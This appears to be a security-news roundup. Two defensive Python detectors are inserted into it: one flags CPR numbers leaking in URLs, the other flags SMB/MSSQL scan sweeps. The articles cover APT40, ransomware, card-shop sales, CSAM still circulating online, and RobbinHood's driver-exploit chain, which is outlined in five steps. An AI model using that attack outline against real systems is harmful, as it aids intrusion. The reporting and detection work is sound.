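        Finding(host, host not in first_party, where, digits[:6] + "-****", cpr_mod11_ok(digits))
        for where, value in fields
        for digits in cpr_candidates(value)
    ]


def scan_log(log_text: str) -> List[Finding]:
    """Constructed log format: '<timestamp> <method> <url>' per line."""
    findings: List[Finding] = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) >= 3:
            findings.extend(scan_url(fields[2]))
    return findings


# Constructed sample, not captured traffic.  Line 1 is the first-party page URL
# (the browser forwards it as Referer to every third-party resource the page
# loads); line 2 carries the same value directly to a third-party host; line 3
# is a look-alike that is not a date; line 4 passes the date check but not mod 11.
SAMPLE_LOG = """\
2020-02-06T10:15:02Z GET https://tastselv.skat.dk/borger/kontakt?cpr=010170-1239&step=2
2020-02-06T10:15:03Z GET https://ajax.googleapis.com/ajax/libs/jquery/1.12.4/jquery.min.js?ref=010170-1239
2020-02-06T10:15:03Z GET https://metrics.third-party.example/b/ss?pageName=kontakt&order=1234567890
2020-02-06T10:15:04Z GET https://metrics.third-party.example/b/ss?pageName=kontakt&uid=0101701234
"""

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f)
```

The first-party URLs are reported too, not just the third-party requests, because a CPR in the page URL leaks via Referer whether or not the application ever sends it to a third party explicitly; the mod-11 flag is there to rank findings, not to discard them.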

DXC acknowledged the vulnerability and addressed it, adding that it has no indication that the data was compromised.

“Together with the Development and Simplification Agency, we have addressed potential vulnerabilities. Based on our immediate review, we currently have no reason to believe that data has been compromised. We are continuing to investigate the matter in close cooperation with the Development and Simplification Board.” said DXC.

In 2014, the company CSC (now DXC) was involved in a similar incident that exposed 900,000 CPR numbers.

The Development and Simplification Board has now asked the Attorney General to investigate the incident to clarify the responsibility of DXC Technology.

Pierluigi Paganini

(SecurityAffairs – Data leak, CPR numbers)

A sad story of pedophilia on how disgusting images fed the web

Journalist Livio Varriale sheds light on a story about pedophilia that starts far back in time and still today has its roots in the darker side of the internet.

Today, I’m going to tell you a horrible story that dwells on the dark web, a story about pedophilia that starts from afar and still today finds its roots in the darker side of the internet.

First, a premise: in the nineties, in a city in Ukraine, a photographic studio was founded whose output fed sites that were innocent-looking yet at the same time forbidden. The story passed in silence and few traces of it remain online. The tragedy is that on the dark side of the Internet there are ogres who abuse children. This is the story of LS-Studios, run by Alexander Chursin, who had to close his business in 2004 after an FBI raid.

The record tells us that some 1,500 models, aged between 7 and 14, posed for this agency, which fed public adult sites with alluring photos in which nudity was not always the main attraction and no sexual acts were captured in the shots.

According to OSINT research carried out by Matricedigitale, the questionable content is still available online: the images can be found on the clear web with simple searches.

A Twitter user publicly reported three links to us, with domains (one of them even a .org) that host the LS-Studios photos. What is, unfortunately, even more disgusting is that on Twitter there are still many active links to directories and torrents from which gigabytes of images can be downloaded.

Unfortunately, it is quite simple to find on social networks like Twitter links to repositories that host archives of child pornography images.

As many as 60 links were still active in 2019; we found several links published via Twitter profiles that explicitly refer to LSMODELS and LSSTUDIOS, in tweets written in different languages, including English, Russian, and Japanese.

In conclusion, more than 600,000 photos hosted on the dark web represent a reservoir of pleasure for ogres; in many cases they are available for free to all those who are attracted to children but who at the same time despise child pornography. Over time, the models in the pictures have grown up, but their faces have been immortalized, and the shots still make them legends in the most horrendous part of the internet.

Additional information about the investigation conducted by Livio Varriale is available at the following links (in Italian):

https://www.matricedigitale.it/ricerche_197/post/la-leggenda-di-lsstudios-vive-nel-dark-web-e-non-solo-_778.html

https://www.youtube.com/channel/UCZ9yZFrvFJvrKZEAwNtJ24A?view_as=subscriber

About the author: Livio Varriale

Pierluigi Paganini

(SecurityAffairs – child pornography, pedophilia)

Malaysia’s MyCERT warns of cyber espionage campaign carried out by APT40

Malaysia’s MyCERT issued a security alert to warn of a hacking campaign targeting government officials that was carried out by the China-linked APT40 group.

Malaysia’s Computer Emergency Response Team (MyCERT) warns of a cyber espionage campaign carried out by the China-linked APT40 group aimed at Malaysian government officials.

The attackers aimed at stealing confidential documents from government systems after having infected them with malware.

“MyCERT observed an increase in number of artifacts and victims involving a campaign against Malaysian Government officials by a specific threat group.” reads the alert issued by MyCERT. “The group's motives are believed to be data theft and exfiltration.”

The attackers used spear-phishing messages sent to government officials, posing as a journalist, an individual from a trade publication, or individuals from a relevant military organization or non-governmental organization (NGO).

The messages contained links to weaponized Office documents stored on Google Drive. Once a document is opened and the victim has enabled macros, the dropper is executed.

The attackers also exploit the Office vulnerabilities CVE-2014-6352 and CVE-2017-0199 to drop and execute the malware on the victim's computer.

“The group’s operations tend to target government-sponsored projects and take large amounts of information specific to such projects, including proposals, meetings, financial data, shipping information, plans and drawings, and raw data,” continues MyCERT.

It is not clear whether the attackers exfiltrated sensitive documents from the government officials' systems.

The advisory doesn’t explicitly attribute the campaign to the Chinese APT, but references included in the alert point to the APT40 hacking group.

The cyber-espionage group tracked as APT40 (aka TEMP.Periscope, TEMP.Jumper, and Leviathan), apparently linked to the Chinese government, focuses on countries important to China's Belt and Road Initiative (i.e. Cambodia, Belgium, Germany, Hong Kong, the Philippines, Malaysia, Norway, Saudi Arabia, Switzerland, the United States, and the United Kingdom).

Experts believe that APT40 is a state-sponsored Chinese APT group due to its alignment with Chinese state interests and technical artifacts suggesting the actor is based in China.

The APT40 group has been active since at least 2013 and appears to be focused on supporting the naval modernization efforts of the Chinese government. The threat actors target the engineering, transportation, and defense sectors, and experts have observed a specific interest in maritime technologies.

The cyberspies also targeted research centres and universities involved in naval research with the intent to access advanced technology to push the growth of the Chinese naval industry.

The list of victims of the APT40 group also includes organizations with operations in Southeast Asia or involved in South China Sea disputes.

In January, a group of anonymous security researchers that calls itself Intrusion Truth reported that APT40 uses 13 front companies operating on the island of Hainan to recruit hackers.

Intrusion Truth did not associate the Hainan group with a specific Chinese APT, but FireEye and Kaspersky researchers believe the China-linked group is APT40 (aka TEMP.Periscope, TEMP.Jumper, and Leviathan).

Pierluigi Paganini

(SecurityAffairs – APT40, China)

A cyber-attack on major banks could trigger a liquidity crisis, ECB President Christine Lagarde warns

The president of the European Central Bank (ECB), Christine Lagarde, is warning that a cyber-attack on a major financial institution could trigger a liquidity crisis.

The president of the European Central Bank (ECB), Christine Lagarde, has warned that a coordinated cyber-attack on major banks could trigger a liquidity crisis.

President Lagarde cited findings of a report by the European Systemic Risk Board (ESRB) that estimate the global cost of cyber attacks at between $45bn and $654bn.

Lagarde warned that an operational outage that encrypted or destroyed the account balances held by a major bank could trigger a liquidity crisis.

“As an operator of critical infrastructures, the ECB obviously takes such threats very seriously,” Lagarde said in France on Wednesday evening.

“History shows that liquidity crises can quickly become systemic crises,” she added. “The ECB is well aware that it has a duty to be prepared and to act pre-emptively.”

President Lagarde remarked that global risks are interlinked, a point illustrated every year in the Global Risks Report published by the World Economic Forum.

Two graphs in the Global Risks Report 2020 show that cyber-attacks rank high on both likelihood and impact.

The second graph shows the close link between the risk of cyber attacks and other risks such as “Critical infrastructure failure”, “Social instability” and “Fiscal crises”.

At a recent board meeting, the European Systemic Risk Board (ESRB)  warned that cyber warfare represents a major source of risk to the financial system.

“Last year, the G7 announced a joint cross-border crisis management exercise on a cyber incident affecting the financial system that it carried out in June 2019, saying that cyber risks were increasing and posed a “genuine and growing threat” to the stability and integrity of the financial sector.” reported the Independent. “It was the first exercise of its kind to be conducted by finance ministries, central banks, regulators and financial market authorities. It did not reveal the results, but the G7 asked its Cyber Experts Group to review financial regulation, and to look at whether the impacts could be measured better.”

In May 2018, the European Central Bank published a European framework for testing the resilience of the financial sector to cyber attacks.

The framework aims to simulate the effects of cyber attacks on critical systems in the banking industry across the European Union.

The move was a response to the numerous cyberheists that have hit the financial industry in recent years, such as the attacks against the SWIFT system and the assault on the online and mobile services of the Netherlands' three top banks.

The framework relies on “red teams” that carry out intelligence-led penetration tests against the systems used by companies in the financial sector.

“The European Central Bank (ECB) today publishes the European Framework for Threat Intelligence-based Ethical Red Teaming (TIBER-EU), which is the first Europe-wide framework for controlled and bespoke tests against cyber attacks in the financial market.” reads the announcement published by the ECB.

“The TIBER-EU framework facilitates a harmonised European approach towards intelligence-led tests which mimic the tactics, techniques and procedures of real hackers who can be a genuine threat. TIBER-EU based tests simulate a cyber attack on an entity’s critical functions and underlying systems, such as its people, processes and technologies. This helps the entity to assess its protection, detection and response capabilities against potential cyber attacks.”

The main goal of the framework is to facilitate testing of cross-border entities that are under the oversight of several authorities; it aims to help organizations measure their ability to detect and respond to cyber attacks.

The ECB's guide “How to implement the European framework for Threat Intelligence-based Ethical Red Teaming” is available on the ECB website.

In August 2019, the European Central Bank (ECB) announced that threat actors had had access for months to the contact information of hundreds of financial-industry subscribers to the newsletter of its Banks' Integrated Reporting Dictionary (BIRD) website.

The BIRD website ran on an external server separate from the ECB infrastructure; according to the bank, neither internal systems nor market-sensitive data were affected.

Pierluigi Paganini

(SecurityAffairs – ECB, Saudi Arabia)

Massive DDoS attack brought down 25% of Iranian Internet connectivity

Iran comes under cyber-attack again, a massive offensive brought down a large portion of the Iranian access to the Internet.

Iranian infrastructure is under attack: a massive cyberattack brought down a large portion of the country's access to the Internet, with national connectivity falling to 75% of ordinary levels according to the experts.

The NetBlocks internet observatory, which tracks disruptions and shutdowns, observed a major outage of the country's Internet connectivity yesterday (February 8, 2020).

According to NetBlocks, the connectivity issue was observed after the Iranian Government activated “Digital Fortress” (also known as DEZHFA/Dejfa), the national cyber shield.

“Network data from the NetBlocks internet observatory confirm extensive disruption to telecommunication networks in Iran on the morning of Saturday, 8 February 2020 lasting several hours.” reads a post published by NetBlocks.

“Network data show a distinct fall in connectivity with several of Iran’s leading network operators from approximately 11:45 a.m. local time (08:15 UTC) affecting cellular and fixed-line operators. Partial recovery was observed one hour after the initial shutdown but other networks returned some seven hours after the incident onset. National connectivity fell to a low point of 75% of ordinary levels for a period during the morning.”

In December 2019, the Iranian telecommunications minister Mohammad Javad Azari Jahromi, announced that the Islamic Republic had recently thwarted a “highly organized cyber attack” targeting its government infrastructure.

In October 2019, addressing the Munich Security Conference (MSC) Cyber Security Summit in Qatar, Azari Jahromi said his country’s cybersecurity project codenamed Digital Fortress (Dejfa) deterred 33 million cyberattacks in 2018.

According to the experts, yesterday's Internet outage in Iran affected several network operators. ICT ministry officials confirmed that the Digital Fortress system repelled a Distributed Denial of Service (DDoS) attack.

Technical data confirm that networks were disabled while the country’s infrastructures were under attack.

A spokesperson for Iran’s Telecommunication Infrastructure Company, confirmed via Twitter that a DDoS attack had been “normalized” with the “intervention of the Dzhafa Shield.”

While NetBlocks pointed out that its observations are consistent with a targeted disruption, the Financial Tribune reported that there is no evidence that the attack was launched by a nation-state actor.

“No sign of state sponsorship of the attack has been detected yet.” Bonabi, of the Telecommunication Infrastructure Company, told the Financial Tribune.

“The attack's sources and destinations were highly distributed. Spoofed source IPs from East Asia and North America were used in the DDoS attack.”

Iran has faced multiple network disruptions in recent months, some of them caused by internal factors.

In December 2019, Iran's telecommunications minister announced that the country had foiled a cyber attack against its infrastructure for the second time in a week.

In November 2019, after the announcement of the government to cut fuel subsidies, protests erupted in Iran and the authorities blocked access to the internet to prevent the spreading of news, videos, and images online.

Pierluigi Paganini

(SecurityAffairs – Iran, hacking)

The number of cyber attacks on Saudi Aramco is increasing

Saudi Aramco, the Saudi Arabian national petroleum and natural gas company, revealed that it has seen an increase in attempted cyber attacks since the fourth quarter of 2019.

The energy industry is under attack: Saudi Aramco announced that it has seen an increase in attempted cyber attacks since the final quarter of 2019. The data is alarming, even though the petroleum giant says it successfully countered them.

“Overall there is definitely an increase in the attempts of (cyber) attacks, and we are very successful in preventing these attacks at the earliest stage possible,” Khalid al-Harbi, Saudi Aramco chief information security officer, told Reuters in a telephone interview.

“The pattern of the (cyber) attacks is cyclical, and we are seeing that the magnitude is increasing, I would suspect that this will continue to be a trend.”

Al-Harbi expressed concerns about the growing trend and for the increase of the magnitude of the attacks. Saudi Arabia’s energy sector has been the target of several cyber attacks in the past.

In August 2012, more than 30,000 systems at Saudi Aramco were infected with the Shamoon malware.

In December 2016, security experts observed a new wave of attacks leveraging the Shamoon malware. Malware experts at Palo Alto Networks and Symantec both reported an attack on a single Saudi company.

The new variant, dubbed Shamoon 2, overwrites the MBR of affected computers with an image of Alan Kurdi, the three-year-old Syrian boy found dead on a Turkish beach.

“Why Shamoon has suddenly returned again after four years is unknown. However, with its highly destructive payload, it is clear that the attackers want their targets to sit up and take notice,” reported Symantec.

In January 2017, researchers at Palo Alto Networks discovered a new strain of the Shamoon 2 malware that was targeting virtualization products.

The researchers at IBM’s X-Force Incident Response and Intelligence Services (IRIS) believe Shamoon malware is a pivot element in information warfare between Saudi Arabia and Iran.

The malware experts identified the servers used to deliver Shamoon and broke into a server used by the attackers to gather more information on the threat and its attack chain.

In December 2017, security firms FireEye and Dragos reported the discovery of a new strain of malware dubbed Triton (aka Trisis) specifically designed to target industrial control systems (ICS).

Neither FireEye nor Dragos attributed the Triton malware to a specific threat actor; they only revealed that it had been used in attacks aimed at an unnamed critical infrastructure organization somewhere in the Middle East, where it caused a shutdown.

Experts at CyberX who analyzed samples of the malware provided further details on the attack, revealing that Triton was likely developed by Iran and used to target an organization in Saudi Arabia.

Saudi Aramco is one of the most important oil suppliers worldwide; its production covers 10% of the global oil supply.

Harbi also revealed that Saudi Aramco personnel were targeted with an Emotet campaign; it should be added, however, that in this case there is no public news of a targeted attack employing the popular malware, which has been distributed globally via malspam campaigns.

Harbi highlighted the difficulty in attributing the attack to a specific threat actor.


Security Affairs newsletter Round 250

A new round of the weekly newsletter arrived! The best news of the week with Security Affairs

Microsoft announces the launch of a bug bounty program for Xbox
Microsoft warns TA505 changed tactic in an ongoing malware campaign
Russia's watchdog Roskomnadzor threatens to fine Twitter and Facebook
The Russian Government blocked ProtonMail and ProtonVPN
Apollon Darknet market is allegedly pulling an exit scam
Attackers are hacking NSC Linear eMerge E3 building access systems to launch DDoS attacks
Police are warning crooks are using cleaners to compromise businesses
Ransomware brought down services of popular TV search engine TVEyes
Sudo CVE-2019-18634 flaw allows non-privileged Linux and macOS users to run commands as root
Facebook fixed a WhatsApp bug that allowed hackers to access local file system
Hackers abused Twitter API to match usernames to phone numbers
NCA arrested six men in UK over Malta Bank Cyber-Heist
The city of Racine was offline following a ransomware attack
Toll Group shuts down some online systems after ransomware attack
Using 99 mobile phones to create a fake traffic jam in Google Maps
Dropbox paid more than $1 Million via its bug bounty program
Expert released PoC exploit code for unpatched backdoor in HiSilicon chips
Google mistakenly shared private videos of some users with others in 2019
Hackers abuse BitBucket to infect 500K+ hosts with arsenal of malware
Microsoft detects 77,000 active web shells on a daily basis
cdpwn – Millions of devices at risk due to flaws in implementations of Cisco Discovery Protocol (CDP)
Hacking Wi-Fi networks by exploiting a flaw in Philips Smart Light Bulbs
Critical Android Bluetooth flaw CVE-2020-0022 could be exploited without user interaction
Iran-linked APT group Charming Kitten targets journalists, political and human rights activists
Japanese defense contractors Pasco and Kobe Steel disclose security breaches
Facebook's official Twitter and Instagram accounts hacked by OurMine
Group-IB detects Half a Million Indian Banks' Cards on Joker's Stash Cardshop
IoT devices at major Manufacturers infected with crypto-miner
RobbinHood ransomware exploits GIGABYTE driver flaw to kill security software


Maastricht University finally paid a 30 bitcoin ransom to crooks

In December, Maastricht University was hit by a ransomware attack; now the university has admitted to paying the ransom requested by the crooks.

In December 2019, Maastricht University (UM) announced that ransomware infected almost all of its Windows systems on December 23.

Maastricht University is a well-regarded institution attended by over 18,000 students, with roughly 4,400 employees and 70,000 alumni.

“Maastricht University (UM) has been hit by a serious cyber attack. Almost all Windows systems have been affected and it is particularly difficult to use e-mail services.” stated a notice published by the UM in December. “UM is currently working on a solution. Extra security measures have been taken to protect (scientific) data. UM is investigating if the cyber attackers have had access to this data.”

At the time the university did not reveal details of the attack or the family of ransomware that infected its systems. It is unclear whether the attackers exfiltrated data from the systems before encrypting them.

Now the university (UM) has admitted to paying the ransom of 30 bitcoin requested by the attackers.

“Since the cyber attack on 23 December 2019, UM has been working hard: on the one hand, to repair the damage and, on the other hand, to make education and research possible again as soon as possible.” read a management summary of the Fox-IT report and UM’s response.

“Part of our technical infrastructure was affected during the attack. That infrastructure consists of 1,647 Linux and Windows servers and 7,307 workstations. The attack ultimately focused on 267 servers of the Windows domain. The attacker focused on encrypting data files in the Windows domain. The backup of a limited number of systems was also affected.”

Now all critical systems at the university are online, and offline backups have been secured.

According to security experts at Fox-IT, the ransomware attack is consistent with other attacks carried out by the TA505 cybercrime gang.

“The modus operandi of the group behind this specific attack corresponds with a criminal group that already has a long history, going back to at least 2014,” reads the Fox-IT full report to UM (in Dutch).

The TA505 hacking group has been active since 2014, focusing on the retail and banking sectors. The group is also known for the evasive techniques it has adopted over time to avoid security controls and penetrate corporate perimeters with several kinds of malware, for instance abusing so-called LOLBins (Living Off The Land Binaries), legitimate programs regularly used by the victim, or abusing validly code-signed payloads.

The TA505 group was involved in campaigns aimed at distributing the Dridex banking Trojan, along with the Locky, BitPaymer, Philadelphia, GlobeImposter, and Jaff ransomware families.

Security experts from cyber-security firm Prevailion reported that TA505 has compromised more than 1,000 organizations.

Recently Microsoft warned that TA505 changed tactics in an ongoing malware campaign.

Fox-IT experts believe that TA505 hackers compromised the university's systems via phishing messages: at least two malicious e-mails were opened on two UM systems on October 15 and 16.

The attackers had gained admin rights on an unpatched machine by November 21 and used lateral movement to infect as many systems as possible with the Clop ransomware.

After careful analysis of the options, on December 30 Maastricht University paid the ransom to decrypt its files.

UM acquired the ransomware decryptor by paying a 30 bitcoin ransom (roughly $220,000 or €220,000).

“During the investigation, traces were found that show that the attacker collected data regarding the topology of the network, usernames and passwords of multiple accounts, and other network architecture information,” reads the report. “Fox-IT did not find any traces within the scope of the investigation that point to the collection of other types of data.”

The decision was taken by the Executive Board after evaluating the consequences of a prolonged downtime on the servers at the university.

“It is a decision that was not taken lightly by the Executive Board. But it was also a decision that had to be made,” states UM. “We felt, in consultation with our management and our supervisory bodies, that we could not make any other responsible choice when considering the interests of our students and staff.”

“The fact that on 6 January and thereafter we were able to have teaching and exams take place, more or less as planned, that UM researchers suffered little or no irreparable damage, and that we were also able to make the salary payments for 4,500 employees on time, strengthens our confidence that we made the right choice.”


IoT devices at major Manufacturers infected with crypto-miner

Hackers have infected with a piece of malware some IoT devices running Windows 7 that were designed by three of the world's largest manufacturers.

Security experts from TrapX reported that some IoT devices running Windows 7 have been infected with a piece of malware; is it a supply chain attack?

The experts reported that several IoT devices at major manufacturers were infected with a cryptocurrency miner in October 2019. The list of infected devices includes automatic guided vehicles, a printer, and a smart TV.

“The malware sample intercepted and analyzed by TrapX® is part of the Lemon_Duck sample family running on a double-click action or through persistence mechanisms.” reads the report published by TrapX. “First, the malware scanned the network for potential targets, including those with SMB (445) or MSSQL (1433) services open. Once finding a potential target, the malware ran multiple threads with multiple functionalities.”
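The scanning step described in the TrapX report is also the step a defender can see first: one internal host touching many distinct neighbours on 445 or 1433 within a short window, which normal SMB or database use almost never does. The following Python detector is an added example (not TrapX's code or tooling) that runs that check over flow/firewall records. The log lines, the host addresses, the threshold of 10 distinct destinations and the 5-minute window are all constructed assumptions for the example.

```python
"""Flag hosts sweeping SMB (445) / MSSQL (1433) across an internal network.

Records are 'ISO-timestamp src dst dport action' lines, one per connection
(a constructed format standing in for whatever the firewall or flow collector exports).
"""
from collections import defaultdict
from datetime import datetime, timedelta

SCAN_PORTS = {445, 1433}             # the two services named in the TrapX report
DEFAULT_THRESHOLD = 10               # distinct destinations per window (assumed tuning value)
DEFAULT_WINDOW = timedelta(minutes=5)


def build_constructed_log():
    """Constructed sample records (not real data) covering one sweep and two benign patterns."""
    lines = []
    # An infected device (10.20.5.17, constructed) probes 24 neighbours on 445 in 24 seconds ...
    for i in range(1, 25):
        lines.append(f"2019-10-14T08:00:{i:02d} 10.20.5.17 10.20.5.{100 + i} 445 allow")
    # ... then re-probes five of the same hosts on 1433 (no new distinct destinations).
    for i in range(1, 6):
        lines.append(f"2019-10-14T08:00:{30 + i:02d} 10.20.5.17 10.20.5.{100 + i} 1433 allow")
    # A workstation talking repeatedly to one file server: normal SMB use, must not alert.
    for i in range(20):
        lines.append(f"2019-10-14T08:{i // 10:02d}:{(i % 10) * 6:02d} 10.20.7.5 10.20.1.10 445 allow")
    # A reporting host querying one database server over 1433: also benign.
    for i in range(5):
        lines.append(f"2019-10-14T08:02:{i * 10:02d} 10.20.7.9 10.20.1.20 1433 allow")
    return "\n".join(lines)


def parse_line(line):
    ts, src, dst, dport, action = line.split()
    return datetime.fromisoformat(ts), src, dst, int(dport), action


def detect_sweeps(log_text, threshold=DEFAULT_THRESHOLD, window=DEFAULT_WINDOW):
    """Return {src: max number of distinct scan-port destinations seen inside any window}."""
    hits = defaultdict(list)  # src -> [(timestamp, dst, dport)]
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, dport, _ = parse_line(line)
        if dport in SCAN_PORTS:
            hits[src].append((ts, dst, dport))

    alerts = {}
    for src, events in hits.items():
        events.sort()
        start = 0
        for end in range(len(events)):
            # Slide the window start forward until events[start:end+1] spans at most `window`.
            while events[end][0] - events[start][0] > window:
                start += 1
            distinct = {dst for _, dst, _ in events[start:end + 1]}
            if len(distinct) >= threshold:
                alerts[src] = max(alerts.get(src, 0), len(distinct))
    return alerts


if __name__ == "__main__":
    for src, count in detect_sweeps(build_constructed_log()).items():
        print(f"ALERT: {src} reached {count} distinct hosts on SMB/MSSQL ports within 5 minutes")
```

The distinct-destination count is what separates a sweep from a chatty but legitimate client: the workstation that hits one file server twenty times never exceeds one destination, while the infected host reaches 24. In a real deployment the threshold should be tuned per subnet, and hosts that legitimately scan (vulnerability scanners, backup servers) allow-listed.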


According to the experts, the attacks could be part of the same malware campaign; the infections were observed at over 50 sites of the manufacturers in the Middle East, North America, and Latin America.

Attackers employed a downloader that runs malicious scripts associated with a cryptocurrency miner named Lemon_Duck. The researchers explained that the malware spread rapidly and is for this reason considered “extremely disruptive.”

“Once again, the entry point was a device running Windows 7. The campaign caused confusion on the production line possibly damaging products AGVs assemble. The malware spread quickly enough to be extremely disruptive.” continues the report. “TrapX software provided early breach detection and allowed the security team to immediately disconnect the infected AGV from the network before severe damage could occur.”

The malware infected embedded systems running Windows 7, an operating system that reached end of life in January.

This incident is worrisome because there are hundreds of millions of systems worldwide that run on top of the Windows 7 operating system.

The report includes a description of the attacks detected by the experts, for example, several automatic guided vehicles (AGVs) that were running Windows 7 were found infected at one manufacturing site.

Infections of AGV systems are very dangerous and could directly threaten human safety; the researchers warn of the risks associated with the disruption of communications and the generation of incorrect commands by the malware.

In another case presented by TrapX, the malware was found on a DesignJet SD Pro multifunction printer that had been used to print technical engineering drawings containing sensitive data related to the target’s production process. In this case, the device was used by attackers as the entry point into the target’s network.

TrapX experts speculate that the cases were the result of a supply chain attack, meaning that the malware was installed on the devices before they were deployed at the manufacturers' sites.

Additional details, including Indicators of Compromise (IoCs) are reported in the analysis published by TrapX.


Facebook’s official Twitter and Instagram accounts hacked by OurMine

The social network giant Facebook is still a target for hackers: its Twitter and Instagram accounts have been hijacked by the popular hacking group OurMine.

Yesterday the popular hacking group OurMine hacked the Twitter and Instagram accounts of Facebook and Messenger.

The company accounts have been quickly restored.

Over the years, the notorious Saudi Arabian OurMine hacking group has hacked the accounts and systems of prominent individuals and organizations, including Facebook CEO Mark Zuckerberg's Pinterest, Twitter, and LinkedIn accounts.

The group claims its intent is to demonstrate that every system or individual can be hacked; in January it hijacked over a dozen accounts belonging to teams in the US National Football League (NFL).

The group disappeared for a long period; its last clamorous hack was the breach of the popular video streaming service Vevo in 2017.

OurMine also hacked the social media accounts of HBO and Game of Thrones, the Netflix US Twitter account (@Netflix) to promote its website and hacking services, and several high-profile Twitter accounts. The list of victims is very long and includes Mark Zuckerberg, Twitter co-founder Evan Williams, David Guetta, Spotify CEO and founder Daniel Ek, former Twitter CEO Dick Costolo, Twitter CEO Jack Dorsey, Google CEO Sundar Pichai, and many others.

Yesterday the group hacked the accounts of the social network giant and posted the following statement:

“Hi, we are OurMine. Well, even Facebook is hackable but at least their security is better then Twitter.”


OurMine also hacked Facebook and Messenger accounts on Instagram and posted a photo of the group’s logo.

According to Facebook, the attack involved a third party, and the accounts were locked once the attack was discovered.

“As soon as we were made aware of the issue, we locked the compromised accounts and are working closely with our partners at Facebook to restore them,” said a Twitter spokesperson.

Facebook also confirmed the hack of its official social media accounts.

“Some of our corporate social accounts were briefly hacked but we have secured and restored access,” Facebook spokesman Joe Osborne said.

https://twitter.com/Facebook/status/1225959837709697025

The hack of Facebook's accounts has similarities with the attack on the NFL teams' accounts. Experts speculate that the accounts were accessed via the third-party marketing platform Khoros, which allows businesses to manage their social media communications.


Group-IB detects Half a Million Indian Banks’ Cards on Joker’s Stash Cardshop

Group-IB experts detected a database containing over 460,000 payment card records uploaded to the Joker's Stash cardshop; most of the records were from Indian banks.

Group-IB, a Singapore-based cybersecurity company that specializes in preventing cyberattacks, has detected a database containing over 460,000 payment card records uploaded to one of the most popular darknet cardshops (Joker’s Stash) on February 5. Over 98 percent of the records were from the biggest Indian banks.

The underground market value of the database is estimated at more than USD 4.2 million. The source of this batch currently remains unknown. Upon discovering the database, Group-IB immediately informed the Indian Computer Emergency Response Team (CERT-In) about the sale of the payment records, so that it could take the necessary steps.

This is the second major upload of payment records related to Indian cardholders registered by Group-IB in the past several months. The first one was reported by Group-IB last October.

On February 5, a new database under the name “INDIA-BIG-MIX” (full name: “[CC] INDIA-BIG-MIX (FRESH SNIFFED CVV) INDIA/EU/WORLD MIX, HIGH VALID 80-85%, uploaded 2020-02-05 (NON-REFUNDABLE BASE)”) went on sale on Joker's Stash, one of the most popular underground cardshops.

Fig. 1: “INDIA-BIG-MIX” database put up for sale on Joker's Stash

According to the Group-IB Threat Intelligence team, the database, comprising 461,976 payment records, exposed card numbers, expiration dates and CVV/CVC codes and, in this case, additional information such as cardholders' full names, emails, phone numbers and addresses.

Fig. 2 Types of information contained in the database published on Joker’s Stash

All the cards from the database are being sold for $9 apiece, with the total underground market value of the batch standing at $4,157,784. As of the morning of February 6, 16 cards had been sold.

According to the Group-IB Threat Intelligence team, this is the only big sale of Indian cards' CC data detected in the past 12 months, since in the previous India case card dumps (the information contained in the card's magnetic stripe) were put up for sale. What distinguishes the new database from its predecessor is that the cards were likely compromised online; this assumption is supported by the set of data offered for sale.

Fig. 3 Graph of sale of Indian bank cards CC data on underground cardshops

“This is the second major leak of cards relating to Indian banks detected by Group-IB Threat Intelligence team in the past several months,” comments Dmitry Shestakov, the head of Group-IB cybercrime research unit. “In the current case, we are dealing with so-called fullz — they have info on card number, expiration date, CVV/CVC, cardholder name as well as some extra personal info. Such type of data is likely to have been compromised online — with the use of phishing, malware, or JS-sniffers — while in the previous case, we dealt with card dumps (the information contained in the card magnetic stripe), which can be stolen through the compromise of offline POS terminals, for example. We have shared all the information discovered with our colleagues from CERT-In.”

On October 28, 2019, the Group-IB Threat Intelligence team detected a huge database holding more than 1.3 million credit and debit card records, mostly belonging to Indian banks' customers, uploaded to Joker's Stash. Group-IB experts estimated the underground market value of that database at more than $130 million. It was the biggest card database encapsulated in a single file ever uploaded to underground markets at once.

According to Group-IB's “Hi-Tech Crime Trends 2019/2020” report, presented at CyberCrimeCon'19 in Singapore last November, the size of the carding market rose by 33 percent year-on-year and totaled USD 879.7 million in H2 2018 — H1 2019. The sale of CC data is also on the rise, having grown by 19 percent in the corresponding period.

One of the reasons behind the growth of the carding market was the activity of JS-sniffers, which enable their operators to steal payment card data from ecommerce websites. This threat should not be underestimated: the APAC region has recently seen its first arrest of JS-sniffer operators, who stole payment card data with the help of the GetBilling JS-sniffer family. The arrest came as a result of a joint operation of Group-IB with INTERPOL and the Indonesian police.

About the author: Group-IB

Group-IB is a Singapore-based provider of solutions aimed at detection and prevention of cyberattacks, online fraud, IP protection and high-profile cyber investigations. Group-IB’s experience, threat hunting & intelligence have been fused into an ecosystem of highly sophisticated software and hardware solutions designed to monitor, identify, and prevent cyber threats.


RobbinHood ransomware exploits GIGABYTE driver flaw to kill security software

The operators behind the infamous RobbinHood ransomware are exploiting a vulnerable GIGABYTE driver to kill antivirus products.

Cybercriminals behind the RobbinHood Ransomware are exploiting a vulnerable GIGABYTE driver to install a malicious and unsigned driver into Windows with the intent of disabling security products.

The ransomware operators deliver a custom antivirus-killing package to workstations to disable security solutions before starting encryption.

Normally, Windows security software processes can only be killed by kernel drivers. To prevent the abuse of kernel drivers, Microsoft implements a driver signature verification mechanism, which means that only kernel drivers co-signed by Microsoft can be installed.

Now security researchers from Sophos have detailed a novel technique implemented by threat actors in attacks involving two pieces of RobbinHood ransomware.


The attackers installed a known vulnerable GIGABYTE driver, co-signed by Microsoft, and exploited a known vulnerability in it to disable Microsoft's driver signature enforcement feature.

“Sophos has been investigating two different ransomware attacks where the adversaries deployed a legitimate, digitally signed hardware driver in order to delete security products from the targeted computers just prior to performing the destructive file encryption portion of the attack.” reads the report published by Sophos. “The signed driver, part of a now-deprecated software package published by Taiwan-based motherboard manufacturer Gigabyte, has a known vulnerability, tracked as CVE-2018-19320.”

The technique used by the operators consists of the following steps:

  1. Attackers get a foothold on the target’s network and install legitimate Gigabyte kernel driver GDRV.SYS.
  2. Attackers exploit the CVE-2018-19320 vulnerability in the legitimate driver to gain kernel access.
  3. Attackers use the kernel access to temporarily disable the Windows OS driver signature enforcement and install a malicious kernel driver named RBNL.SYS.
  4. Attackers use this driver to disable security products.
  5. Attackers execute the RobbinHood ransomware and attempt to encrypt the files on the infected host.
